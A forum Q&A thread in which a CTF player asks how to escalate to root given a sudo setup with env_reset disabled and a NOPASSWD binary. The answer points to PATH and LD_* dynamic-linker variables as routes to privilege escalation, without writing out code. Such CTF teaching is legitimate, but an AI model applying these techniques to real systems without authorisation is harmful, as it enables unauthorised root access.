I am doing a ctf and I am in the last step of it –privilege escalation. With the sudo -l
command, the output was this:
Matching Defaults entries for nick on 192:
always_set_home, !env_reset, env_keep="LANG LC_ADDRESS LC_CTYPE LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
LC_PAPER LC_TELEPHONE LC_ATIME LC_ALL LANGUAGE LINGUAS XDG_SESSION_COOKIE",!insults, targetpw
User nick may run the following commands on 192:
(ALL) ALL
(root) NOPASSWD: /restart-apache
I know that env_reset shouldn't be disabled but I can't figure out the way to use it to get root access!
$ file restart-apache
restart-apache: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, BuildID[sha1]=1b1a4ab278b2d1be83e8b14adfc358cfd277d655, for GNU/Linux 3.2.0, with debug_info, not stripped
Best Answer
From the sudoers man page:
So, you can insert arbitrary environment variables to the launched process.
You don't show what sort of a program
/restart-apache
is, but if just so happens to be a shell script, this should be easy. Can you think of any environment variables that would affect what it does? What happens, exactly, when a shell script runs pretty much any command? Where does it find it?Ok, turns out I didn't get lucky, and it was an actual compiled program instead, so it probably doesn't run that many commands via
PATH
. It still might, but it's hard to count on that.That output from
file
looks like it might be truncated: the output I get fromfile /bin/ls
is this (split to multiple lines):(The full path to the interpreter is missing from the output in the question.)
If your program uses
ld-linux-x86-64.so.2
, as all "normal" dynamic executables do, we can start looking at what actually happens when you run such a program. E.g. from here: What is /lib64/ld-linux-x86-64.so.2 and why can it be used to execute file?.Spoiler: the program itself isn't what first runs.
We also find the man page of the dynamic linker. That man page lists some interesting environment variables, which affect the way the program is set up when started, the ones with names like
LD_*
. You may need to do some coding to get it to do what you want.